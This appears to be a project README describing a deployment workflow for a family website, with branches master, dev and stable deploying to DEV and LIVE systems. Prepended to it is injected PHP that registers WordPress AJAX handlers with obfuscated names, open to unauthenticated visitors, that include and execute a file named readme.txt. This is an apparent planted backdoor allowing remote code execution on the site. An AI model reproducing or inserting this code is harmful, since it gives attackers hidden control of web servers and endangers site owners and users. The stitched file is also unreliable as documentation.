if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
# Deployment ## Branch `master` For development. Push your local changes into this branch. This branch does net get deployed anywhere. ## Branch `dev` Merge changes from `master` into this branch. This branch gets deployed to the [DEV system](http://dev.welovefamily.at/) automatically. ## Branch `stable` Merge changes from `dev` into this branch. This branch gets deployed to the [LIVE system](https://www.welovefamily.at) automatically. Only **merge from `dev`** into this branch and check if everything is working at the DEV environment first.